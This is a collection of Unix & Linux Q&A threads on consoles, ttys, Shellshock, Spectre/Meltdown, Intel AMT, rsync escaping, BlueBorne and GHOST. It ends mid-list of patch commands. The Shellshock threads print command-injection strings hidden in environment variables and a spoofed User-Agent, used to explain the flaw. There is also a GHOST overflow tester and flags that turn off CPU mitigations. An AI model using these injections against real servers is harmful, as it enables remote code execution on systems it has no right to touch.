|
Solaris 10 does not have virtual consoles. They were not introduced to Solaris until Solaris 11.
The major customers for Solaris tend to be large-scale enterprises, where the ability to use virtual consoles isn't needed as much as it is for desktop systems.
|
I refuse to believe Solaris 10 has no virtual consoles.
I did
svcadm enable svc:/system/console-login:defaultNothing happens: no virtual consoles, the service remains offline,
and no error is given.
If I look at the script of this SMF service, it gives me this command:
/usr/lib/saf/ttymon -g -d /dev/console -l console -m ldterm,ttcompat -h -p solaris10.blu.privata console login: and on the console I see... no output.
Of course, solaris10.blu.privata is reachable by ping.
So... no virtual consoles? Or is there another way?
|
solaris 10..no virtual consoles?
|
Why are there so many ttys?In the past there was no graphical subsystem and no apps like screen/tmux, so multiple consoles made it possible to switch easily between multiple running tasks [under multiple users] simultaneously.Are multiple ttys necessary?No, you may as well have a single one.Why are multiple things spread in different ttys? For example, I have the runit logs on tty1, wm on tty7, and a blinking white cursor in the corner of the screen on tty8. Why not everything in one tty?Historical conventions.Why not everything in one tty?If you have only one console and you run Xorg on top of it, you no longer have that console. In case Xorg misbehaves, you're left with a semi-functional system.Why doesn't Linux place these in order - tty1: runit logs, tty2: wm, etc.Historical conventions. You may reconfigure everything however you like.How to get fewer ttys with Systemd?
https://wiki.archlinux.org/title/getty
man 5 logind.conf
Where Xorg runs depends on your display manager.What does the blinking cursor mean?An uninitialized console with no applications running on it.
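For example, with systemd the number of virtual terminals that logind spawns gettys on can be reduced in /etc/systemd/logind.conf (a sketch; the values below are just examples, see man 5 logind.conf for the defaults):

```
[Login]
NAutoVTs=2
ReserveVT=6
```

NAutoVTs limits how many VTs get a getty allocated on demand; ReserveVT keeps one VT unconditionally reserved for a getty.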
|
Why are there so many ttys? Are multiple ttys necessary?
Why are multiple things spread in different ttys? For example, I have the runit logs on tty1, wm on tty7, and a blinking white cursor in the corner of the screen on tty8. Why not everything in one tty?
Why doesn't Linux place these in order - tty1: runit logs, tty2: wm, etc.?
What does the blinking cursor mean?
|
Questions about tty
|
bash stores exported function definitions as environment variables. Exported functions look like this:
$ foo() { bar; }
$ export -f foo
$ env | grep -A1 foo
foo=() { bar
}That is, the environment variable foo has the literal contents:
() { bar
}When a new instance of bash launches, it looks for these specially crafted environment variables, and interprets them as function definitions. You can even write one yourself, and see that it still works:
$ export foo='() { echo "Inside function"; }'
$ bash -c 'foo'
Inside functionUnfortunately, the parsing of function definitions from strings (the environment variables) can have wider effects than intended. In unpatched versions, it also interprets arbitrary commands that occur after the termination of the function definition. This is due to insufficient constraints in the determination of acceptable function-like strings in the environment. For example:
$ export foo='() { echo "Inside function" ; }; echo "Executed echo"'
$ bash -c 'foo'
Executed echo
Inside functionNote that the echo outside the function definition has been unexpectedly executed during bash startup. The function definition is just a step to get the evaluation and exploit to happen, the function definition itself and the environment variable used are arbitrary. The shell looks at the environment variables, sees foo, which looks like it meets the constraints it knows about what a function definition looks like, and it evaluates the line, unintentionally also executing the echo (which could be any command, malicious or not).
This is considered insecure because variables are not typically allowed or expected, by themselves, to directly cause the invocation of arbitrary code contained in them. Perhaps your program sets environment variables from untrusted user input. It would be highly unexpected that those environment variables could be manipulated in such a way that the user could run arbitrary commands without your explicit intent to do so using that environment variable for such a reason declared in the code.
Here is an example of a viable attack. You run a web server that runs a vulnerable shell, somewhere, as part of its lifetime. This web server passes environment variables to a bash script, for example, if you are using CGI, information about the HTTP request is often included as environment variables from the web server. For example, HTTP_USER_AGENT might be set to the contents of your user agent. This means that if you spoof your user agent to be something like '() { :; }; echo foo', when that shell script runs, echo foo will be executed. Again, echo foo could be anything, malicious or not.
|
There is apparently a vulnerability (CVE-2014-6271) in bash: Bash specially crafted environment variables code injection attack
I am trying to figure out what is happening, but I'm not entirely sure I understand it. How can the echo be executed as it is in single quotes?
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a testEDIT 1: A patched system looks like this:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a testEDIT 2: There is a related vulnerability / patch: CVE-2014-7169 which uses a slightly different test:
$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"unpatched output:
vulnerable
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
bash: error importing function definition for `BASH_FUNC_x'
testpartially (early version) patched output:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
testpatched output up to and including CVE-2014-7169:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
testEDIT 3: story continues with:CVE-2014-7186
CVE-2014-7187
CVE-2014-6277
|
What does env x='() { :;}; command' bash do and why is it insecure?
|
A number of kernel boot parameters are available to disable or fine-tune hardware vulnerability mitigations:for Spectre v1 and v2: nospectre_v1 (x86, PowerPC), nospectre_v2 (x86, PowerPC, S/390, ARM64), spectre_v2_user=off (x86)
for SSB: spec_store_bypass_disable=off (x86, PowerPC), ssbd=force-off (ARM64)
for L1TF: l1tf=off (x86)
for MDS: mds=off (x86)
for TAA: tsx_async_abort=off
for iTLB multihit: kvm.nx_huge_pages=off
for SRBDS: srbds=off
for retbleed: retbleed=off
KPTI can be disabled with nopti (x86, PowerPC) or kpti=0 (ARM64)A meta-parameter, mitigations, was introduced in 5.2 and back-ported to 5.1.2, 5.0.16, and 4.19.43 (and perhaps others). It can be used to control all mitigations, on all architectures, as follows:mitigations=off will disable all optional CPU mitigations;
mitigations=auto (the default setting) will mitigate all known CPU vulnerabilities, but leave SMT enabled (if it is already);
mitigations=auto,nosmt will mitigate all known CPU vulnerabilities and disable SMT if appropriate.Some of these can be toggled at runtime; see the linked documentation for details.
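Since kernel 4.15, the effective status of each mitigation can be read back at runtime from sysfs, which is useful for verifying that a boot parameter actually took effect (a sketch; the directory is absent on older kernels):

```shell
# Print the kernel's own report for each known CPU vulnerability.
dir=/sys/devices/system/cpu/vulnerabilities
if [ -d "$dir" ]; then
  for f in "$dir"/*; do
    printf '%s: %s\n' "${f##*/}" "$(cat "$f")"
  done
else
  echo "no vulnerabilities directory (kernel too old?)"
fi
```

With mitigations=off on the kernel command line, the entries report "Vulnerable" instead of the usual "Mitigation: ..." strings.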
|
Can I disable Spectre and Meltdown mitigation features in Ubuntu 18.04LTS?
I want to test how much more performance I gain when I disable these two features in Linux and, if the gain is significant, make the change permanent.
|
Disable Spectre and Meltdown mitigations
|
Alan Cox shared a link from AMD's blog:
https://www.amd.com/en/corporate/speculative-execution
Variant One: Bounds Check BypassResolved by software / OS updates to be made available by system
vendors and manufacturers. Negligible performance impact expected.Variant Two: Branch Target InjectionDifferences in AMD architecture mean there is a near zero risk of
exploitation of this variant. Vulnerability to Variant 2 has not been
demonstrated on AMD processors to date.Variant Three: Rogue Data Cache LoadZero AMD vulnerability due to AMD architecture differences.It would be good to have third-party confirmation of these statements from AMD, though.
The 'mitigation' on affected systems would require a new kernel and a reboot, but many distributions have not yet released packages with the fixes:https://www.cyberciti.biz/faq/patch-meltdown-cpu-vulnerability-cve-2017-5754-linux/Debian:https://security-tracker.debian.org/tracker/CVE-2017-5715
https://security-tracker.debian.org/tracker/CVE-2017-5753
https://security-tracker.debian.org/tracker/CVE-2017-5754Other sources of information I found:https://lists.bufferbloat.net/pipermail/cerowrt-devel/2018-January/011108.html
https://www.reddit.com/r/Amd/comments/7o2i91/technical_analysis_of_spectre_meltdown/
|
Security researchers have published, on Project Zero, a new pair of vulnerabilities called Spectre and Meltdown allowing a program to steal information from the memory of other programs. They affect the Intel, AMD and ARM architectures.
This flaw can be exploited remotely by visiting a website running malicious JavaScript. Technical details can be found on the Red Hat website and from the Ubuntu security team.Information Leak via speculative execution side channel attacks (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754 a.k.a. Spectre and Meltdown)
It was discovered that a new class of side channel attacks impact most processors, including processors from Intel, AMD, and ARM. The attack allows malicious userspace processes to read kernel memory and malicious code in guests to read hypervisor memory. To address the issue, updates to the Ubuntu kernel and processor microcode will be needed. These updates will be announced in future Ubuntu Security Notices once they are available.Example Implementation in JavaScriptAs a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs.My system seem to be affected by the spectre vulnerability. I have compiled and executed this proof-of-concept (spectre.c).
System information:
$ uname -a
4.13.0-0.bpo.1-amd64 #1 SMP Debian 4.13.13-1~bpo9+1 (2017-11-22) x86_64 GNU/Linux$ cat /proc/cpuinfo
model name : Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz$gcc --version
gcc (Debian 6.3.0-18) 6.3.0 20170516How to mitigate the Spectre and Meltdown vulnerabilities on Linux systems?
Further reading: Using Meltdown to steal passwords in real time.
Update
Using the Spectre & Meltdown Checker after switching to the 4.9.0-5 kernel version, following @Carlos Pasqualini's answer, because a security update is available to mitigate CVE-2017-5754 on Debian Stretch:
CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Checking count of LFENCE opcodes in kernel: NO (only 31 opcodes found, should be >= 70)
> STATUS: VULNERABLE (heuristic to be improved when official patches become available)CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Hardware (CPU microcode) support for mitigation: NO
* Kernel support for IBRS: NO
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* Mitigation 2
* Kernel compiled with retpoline option: NO
* Kernel compiled with a retpoline-aware compiler: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpoline are needed to mitigate the vulnerability)CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): YES
* PTI enabled and active: YES
> STATUS: NOT VULNERABLE (PTI mitigates the vulnerability)Update Jan 25, 2018
The spectre-meltdown-checker script is officially packaged by Debian; it is available for Debian Stretch through the backports repository, and in Buster and Sid.
Update 05/22/2018
Speculative Store Bypass (SSB) – also known as Variant 4Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.Rogue System Register Read (RSRE) – also known as Variant 3aSystems with microprocessors utilizing speculative execution and that perform speculative reads of system registers may allow unauthorized disclosure of system parameters to an attacker with local user access via a side-channel analysis.Edit July 27, 2018
NetSpectre: Read Arbitrary Memory over NetworkIn this paper, we present NetSpectre, a new attack based on
Spectre variant 1, requiring no attacker-controlled code on the
target device, thus affecting billions of devices. Similar to a local
Spectre attack, our remote attack requires the presence of a Spectre
gadget in the code of the target. We show that systems containing
the required Spectre gadgets in an exposed network interface or API
can be attacked with our generic remote Spectre attack, allowing to
read arbitrary memory over the network. The attacker only sends
a series of crafted requests to the victim and measures the response
time to leak a secret value from the victim’s memory.
|
How to mitigate the Spectre and Meltdown vulnerabilities on Linux systems?
|
The clearest post I’ve seen on this issue is Matthew Garrett’s (including the comments).
Matthew has now released a tool to check your system locally: build it, run it with
sudo ./mei-amt-checkand it will report whether AMT is enabled and provisioned, and if it is, the firmware versions (see below). The README has more details.
To scan your network for potentially vulnerable systems, scan ports 623, 664, and 16992 to 16995 (as described in Intel’s own mitigation document); for example
nmap -p16992,16993,16994,16995,623,664 192.168.1.0/24will scan the 192.168.1/24 network, and report the status of all hosts which respond. Being able to connect to port 623 might be a false positive (other IPMI systems use that port), but any open port from 16992 to 16995 is a very good indicator of enabled AMT (at least if they respond appropriately: with AMT, that means an HTTP response on 16992 and 16993, the latter with TLS).
If you see responses on ports 16992 or 16993, connecting to those and requesting / using HTTP will return a response with a Server line containing “Intel(R) Active Management Technology” on systems with AMT enabled; that same line will also contain the version of the AMT firmware in use, which can then be compared with the list given in Intel’s advisory to determine whether it’s vulnerable.
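As a sketch of that last step, the firmware version can be pulled out of such a Server header with a little sed (the amt_version helper name and the sample header value are illustrative assumptions based on the format described above):

```shell
# Hypothetical helper: extract the AMT firmware version from an HTTP Server header.
amt_version() {
  printf '%s\n' "$1" | sed -n 's/.*Active Management Technology \([0-9.]*\).*/\1/p'
}

amt_version 'Server: Intel(R) Active Management Technology 9.1.40'   # prints: 9.1.40
```

The extracted version can then be compared against the ranges in Intel's advisory.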
See CerberusSec’s answer for a link to a script automating the above.
There are two ways to fix the issue “properly”:upgrade the firmware, once your system’s manufacturer provides an update (if ever);
avoid using the network port providing AMT, either by using a non-AMT-capable network interface on your system, or by using a USB adapter (many AMT workstations, such as C226 Xeon E3 systems with i210 network ports, have only one AMT-capable network interface — the rest are safe; note that AMT can work over wi-fi, at least on Windows, so using built-in wi-fi can also lead to compromise).If neither of these options is available, you’re in mitigation territory. If your AMT-capable system has never been provisioned for AMT, then you’re reasonably safe; enabling AMT in that case can apparently only be done locally, and as far as I can tell requires using your system’s firmware or Windows software. If AMT is enabled, you can reboot and use the firmware to disable it (press CtrlP when the AMT message is displayed during boot).
Basically, while the privilege vulnerability is quite nasty, it seems most Intel systems aren’t actually affected. For your own systems running Linux or another Unix-like operating system, escalation probably requires physical access to the system to enable AMT in the first place. (Windows is another story.) On systems with multiple network interfaces, as pointed out by Rui F Ribeiro, you should treat AMT-capable interfaces in the same way as you’d treat any administrative interface (IPMI-capable, or the host interface for a VM hypervisor) and isolate it on an administrative network (physical or VLAN). You cannot rely on a host to protect itself: iptables etc. are ineffective here, because AMT sees packets before the operating system does (and keeps AMT packets to itself).
VMs can complicate matters, but only in the sense that they can confuse AMT and thus produce confusing scanning results if AMT is enabled. amt-howto(7) gives the example of Xen systems where AMT uses the address given to a DomU over DHCP, if any, which means a scan would show AMT active on the DomU, not the Dom0...
|
According to the Intel security-center post dated May 1, 2017, there is a critical vulnerability on Intel processors which could allow an attacker to gain privilege (escalation of privilege) using AMT, ISM and SBT.
Because the AMT has direct access to the computer’s network hardware, this hardware vulnerability will allow an attacker to access any system.There is an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology firmware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products. This vulnerability does not exist on Intel-based consumer PCs.Intel has released a detection tool available for Windows 7 and 10. I am using information from dmidecode -t 4 and by searching on the Intel website I found that my processor uses Intel® Active Management Technology (Intel® AMT) 8.0.Affected products:
The issue has been observed in Intel manageability firmware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 for Intel® Active Management Technology, Intel® Small Business Technology, and Intel® Standard Manageability. Versions before 6 or after 11.6 are not impacted.The description:An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology (SBT)How can I easily detect and mitigate the Intel escalation of privilege vulnerability on a Linux system?
|
How to detect and mitigate the Intel escalation of privilege vulnerability on a Linux system (CVE-2017-5689)?
|
Having manually bisected, this is a bug in rsync and is fixed by commit 5c93dedf4538 ("Add backtick to SHELL_CHARS."), which will be in the upcoming rsync 3.2.8 (not yet released). It was broken by commit 6b8db0f6440b ("Add an arg-protection idiom using backslash-escapes"), which is in 3.2.4.
As a mitigation, an option to use the old arg parsing behaviour (--old-args) exists:
rsync --old-args 'server:./\`a\`b' .
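The underlying failure is that the filename passes through a remote shell, where unescaped backticks trigger command substitution. A local simulation of what happens on the remote side (no rsync or server involved; sh stands in for the remote login shell):

```shell
arg='./`a`b'
# Unescaped: the inner shell evaluates `a` as a command substitution
# ("a: command not found" goes to stderr and the backticked part vanishes).
sh -c "echo $arg" 2>/dev/null      # prints: ./b

# Backslash-escaped backticks survive the inner shell intact.
sh -c 'echo ./\`a\`b'              # prints: ./`a`b
```

This is exactly why the escaped form ./\`a\`b combined with --old-args works: the escapes protect the backticks through the one remaining shell evaluation.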
|
Yeah, I know what you are thinking: "Who on earth names their file `a`b?"
But let us assume you do have a file called `a`b (possibly made by a crazy Mac user - obviously not by you), and you want to rsync that. The obvious solution:
rsync server:'./`a`b' ./.;
rsync 'server:./`a`b' ./.;gives:
bash: line 1: a: command not found
rsync: [sender] link_stat "/home/tange/b" failed: No such file or directory (2)
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1865) [Receiver=3.2.7]
rsync: [Receiver] write error: Broken pipe (32)Even:
$ rsync 'server:./\`a\`b' ./.;
bash: line 3: a\: command not found
rsync: [sender] link_stat "/home/tange/\b" failed: No such file or directory (2)
:What is the rsync command I should be running?
$ rsync --version
rsync version 3.2.7 protocol version 31
|
rsync the file `a`b
|
The coordinated disclosure date for the BlueBorne vulnerabilities was September 12, 2017; you should see distribution updates with fixes for the issues shortly thereafter. For example:RHEL
Debian CVE-2017-1000250 and CVE-2017-1000251Until you can update the kernel and BlueZ on affected systems, you can mitigate the issue by disabling Bluetooth (which might have adverse effects of course, especially if you use a Bluetooth keyboard or mouse):blacklist the core Bluetooth modules
printf "install %s /bin/true\n" bnep bluetooth btusb >> /etc/modprobe.d/disable-bluetooth.confdisable and stop the Bluetooth service
systemctl disable bluetooth.service
systemctl mask bluetooth.service
systemctl stop bluetooth.serviceremove the Bluetooth modules
rmmod bnep
rmmod bluetooth
rmmod btusb(this will probably fail at first with an error indicating other modules are using these; you’ll need to remove those modules and repeat the above commands).If you want to patch and rebuild BlueZ and the kernel yourself, the appropriate fixes are available here for BlueZ and here for the kernel.
|
Armis Labs has discovered a new attack vector affecting all devices with Bluetooth enabled, including Linux and IoT systems.BlueBorne attack on Linux
Armis has disclosed two vulnerabilities in the Linux operating system which allow attackers to take complete control over infected devices. The first is an information leak vulnerability, which can help the attacker determine the exact version used by the targeted device and adjust his exploit accordingly. The second is a stack overflow which can lead to full control of a device.For instance, all devices with Bluetooth enabled should be marked as malicious. The infected devices will create a malicious network allowing the attacker to take control of all devices out of its Bluetooth range. Using Bluetooth on a Linux system to connect peripheral devices
(keyboards, mice, headphones, etc.) puts Linux under various risks.This attack does not require any user interaction, authentication or pairing, making it also practically invisible.
All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).All my Linux OSes with Bluetooth enabled are marked as vulnerable after a check with the BlueBorne Vulnerability Scanner (an Android application by Armis; discovering vulnerable devices requires enabling device discovery, but the attack itself only requires Bluetooth to be enabled).
Is there a way to mitigate the BlueBorne attack when using Bluetooth on a Linux system?
|
How do I secure Linux systems against the BlueBorne remote attack?
|
To reassure a few, I didn't find the bug by observing exploits, I have
no reason to believe it's been exploited before being disclosed
(though of course I can't rule it out). I did not find it by
looking at bash's code either.
I can't say I remember exactly my train of thoughts at the time.
That more or less came from some reflection on some behaviours of
some software I find dangerous (the behaviours, not the
software). The kind of behaviour that makes you think: that
doesn't sound like a good idea.
In this case, I was reflecting on the common configuration of
ssh that allows passing environment variables unsanitised from
the client provided their name starts with LC_. The idea is so
that people can keep using their own language when sshing into
other machines. A good idea until you start to consider
how complex localisation handling is especially when UTF-8 is
brought into the equation (and seeing how badly it's handled by
many applications).
Back in July 2014, I had already reported a vulnerability in
glibc localisation handling which combined with that sshd
config, and two other dangerous behaviours of the bash shell
allowed (authenticated) attackers to hack into git servers
provided they were able to upload files there and bash was
used as the login shell of the git unix user (CVE-2014-0475).
I was thinking it was probably a bad idea to use bash as the login
shell of users offering services over ssh, given that it's quite
a complex shell (when all you need is just parsing a very simple command line) and has inherited most of the misdesigns of ksh.
Since I had already identified a few problems with bash being
used in that context (to interpret ssh ForceCommands), I was
wondering if there were potentially more there.
AcceptEnv LC_* allows any variable whose name starts
with LC_ and I had the vague recollection that bash exported
functions (a dangerous albeit at times useful feature) were
using environment variables whose name was something like
myfunction() and was wondering if there was not something
interesting to look at there.
I was about to dismiss it on the ground that the worst thing one
could do would be to redefine a command called LC_something
which could not really be a problem as those are not existing
command names, but then I started to wonder how bash
imported those environment variables.
What if the variables were called LC_foo;echo test; f() for instance? So I decided to have a closer look.
A:
$ env -i bash -c 'zzz() { :;}; export -f zzz; env'
[...]
zzz=() { :
}revealed that my recollection was wrong in that the variables
were not called myfunction() but myfunction (and it's the
value that starts with ()).
And a quick test:
$ env 'true;echo test; f=() { :;}' bash -c :
test
bash: error importing function definition for `true;echo test; f'confirmed my suspicion that the variable name was not sanitized,
and the code was evaluated upon startup.
Worse, a lot worse, the value was not sanitized either:
$ env 'foo=() { :;}; echo test' bash -c :
testThat meant that any environment variable could be a vector.
That's when I realised the extent of the problem, confirmed that it was
exploitable over HTTP as well (HTTP_xxx/QUERYSTRING... env vars), via other vectors like mail processing services, later DHCP (and probably a long list), and
reported it (carefully).
|
Since this bug affects so many platforms, we might learn something from the process by which this vulnerability was found: was it an εὕρηκα (eureka) moment or the result of a security check?
Since we know Stéphane found the Shellshock bug, and others may know the process as well, we would be interested in the story of how he came to find the bug.
|
How was the Shellshock Bash vulnerability found?
|
Answer to my question, from Qualys:During our testing, we developed a proof-of-concept in which we send a
specially created e-mail to a mail server and can get a remote shell
to the Linux machine. This bypasses all existing protections (like
ASLR, PIE and NX) on both 32-bit and 64-bit systems.My compiled research below for anyone else looking:Disclaimer
Despite what a lot of other threads/blogs might tell you, I suggest not blindly updating every single OS you have without thoroughly testing these glibc updates first. It has been reported that the glibc updates have caused massive application segfaults, forcing people to roll back to their previous glibc version.
One does not simply mass-update a production environment without testing.Background Information
GHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application.
Impact
The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.
Current list of affected Linux distros
RHEL (Red Hat Enterprise Linux) version 5.x, 6.x and 7.x
RHEL 4 ELS fix available ---> glibc-2.3.4-2.57.el4.2
Desktop (v. 5) fix available ---> glibc-2.5-123.el5_11.1
Desktop (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Desktop (v. 7) fix available ---> glibc-2.17-55.el7_0.5
HPC Node (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
HPC Node (v. 7) fix available ---> glibc-2.17-55.el7_0.5
Server (v. 5) fix available ---> glibc-2.5-123.el5_11.1
Server (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Server (v. 7) fix available ---> glibc-2.17-55.el7_0.5
Server EUS (v. 6.6.z) fix available ---> glibc-2.12-1.149.el6_6.5
Workstation (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Workstation (v. 7) fix available ---> glibc-2.17-55.el7_0.5CentOS Linux version 5.x, 6.x & 7.x
CentOS-5 fix available ---> glibc-2.5-123.el5_11
CentOS-6 fix available ---> glibc-2.12-1.149.el6_6.5
CentOS-7 fix available ---> glibc-2.17-55.el7_0.5Ubuntu Linux version 10.04, 12.04 LTS
10.04 LTS fix available ---> libc6-2.11.1-0ubuntu7.20
12.04 LTS fix available ---> libc6-2.15-0ubuntu10.10Debian Linux version 6.x, 7.x
6.x squeeze vulnerable
6.x squeeze (LTS) fix available ---> eglibc-2.11.3-4+deb6u4
7.x wheezy vulnerable
7.x wheezy (security) fix available ---> glib-2.13-38+deb7u7Linux Mint version 13.0
Mint 13 fix available ---> libc6-2.15-0ubuntu10.10Fedora Linux version 19 (or older should upgrade)
Fedora 19 - vulnerable - EOL on Jan 6, 2015 (upgrade to Fedora 20/21 for patch)SUSE Linux Enterprise
Server 10 SP4 LTSS for x86 fix available ---> glibc-2.4-31.113.3
Server 10 SP4 LTSS for AMD64 and Intel EM64T fix available ---> glibc-2.4-31.113.3
Server 10 SP4 LTSS for IBM zSeries 64bit fix available ---> glibc-2.4-31.113.3
Software Development Kit 11 SP3 fix available ---> glibc-2.11.3-17.74.13
Server 11 SP1 LTSS fix available ---> glibc-2.11.1-0.60.1
Server 11 SP2 LTSS fix available ---> glibc-2.11.3-17.45.55.5
Server 11 SP3 (VMware) fix available ---> glibc-2.11.3-17.74.13
Server 11 SP3 fix available ---> glibc-2.11.3-17.74.13
Desktop 11 SP3 fix available ---> glibc-2.11.3-17.74.13openSUSE (versions older than 11 should upgrade)
11.4 Evergreen fix available ---> glibc-2.11.3-12.66.1
12.3 fix available ---> glibc-2.17-4.17.1What packages/applications are still using the deleted glibc?
(credits to Gilles)
For CentOS/RHEL/Fedora/Scientific Linux:
lsof -o / | awk '
BEGIN {
while (("rpm -ql glibc | grep \\\\.so\\$" | getline) > 0)
libs[$0] = 1
}
$4 == "DEL" && $8 in libs {print $1, $2}'For Ubuntu/Debian Linux:
lsof -o / | awk '
BEGIN {
while (("dpkg -L libc6:amd64 | grep \\\\.so\\$" | getline) > 0)
libs[$0] = 1
}
$4 == "DEL" && $8 in libs {print $1, $2}'What C library (glibc) version does my Linux system use?
The easiest way to check the version number is to run the following command:
ldd --version

Sample outputs from RHEL/CentOS Linux v6.6:
ldd (GNU libc) 2.12
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Sample outputs from Ubuntu Linux 12.04.5 LTS:
ldd (Ubuntu EGLIBC 2.15-0ubuntu10.9) 2.15
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Sample outputs from Debian Linux v7.8:
ldd (Debian EGLIBC 2.13-38+deb7u6) 2.13
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

GHOST vulnerability check
The University of Chicago is hosting the below script for easy downloading:
$ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
[OR]
$ curl -O https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[responds vulnerable OR not vulnerable ]

/* ghosttester.c: GHOST vulnerability tester */
/* Credit: http://www.openwall.com/lists/oss-security/2015/01/27/9 */
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;

/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';

retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}

Compile and run it as follows:
$ gcc ghosttester.c -o ghosttester
$ ./ghosttester
[responds vulnerable OR not vulnerable ]

Red Hat Access Lab: GHOST tool. Do not use this tool; its reporting is wrong. The vulnerability checker from Qualys is accurate.

Patching

CentOS/RHEL/Fedora/Scientific Linux
sudo yum clean all
sudo yum update

Now restart for the update to take effect:
sudo reboot

Alternatively, if your mirror doesn't contain the newest packages, just download them manually. *note: for more advanced users
CentOS 5
http://mirror.centos.org/centos/5.11/updates/x86_64/RPMS/

CentOS 6
mkdir ~/ghostupdate
cd ~/ghostupdate

wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-devel-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-common-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/nscd-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-static-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-headers-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-utils-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-static-2.12-1.149.el6_6.5.i686.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-devel-2.12-1.149.el6_6.5.i686.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-2.12-1.149.el6_6.5.i686.rpm

yum localupdate *.rpm [OR] rpm -Uvh *.rpm

Ubuntu/Debian Linux
sudo apt-get clean
sudo apt-get update
sudo apt-get dist-upgrade

Restart:
sudo reboot

SUSE Linux Enterprise
To install this SUSE Security Update use YaST online_update. Or use the following commands as per your version:
SUSE Linux Enterprise Software Development Kit 11 SP3
zypper in -t patch sdksp3-glibc-10206

SUSE Linux Enterprise Server 11 SP3 for VMware
zypper in -t patch slessp3-glibc-10206

SUSE Linux Enterprise Server 11 SP3
zypper in -t patch slessp3-glibc-10206

SUSE Linux Enterprise Server 11 SP2 LTSS
zypper in -t patch slessp2-glibc-10204

SUSE Linux Enterprise Server 11 SP1 LTSS
zypper in -t patch slessp1-glibc-10202

SUSE Linux Enterprise Desktop 11 SP3
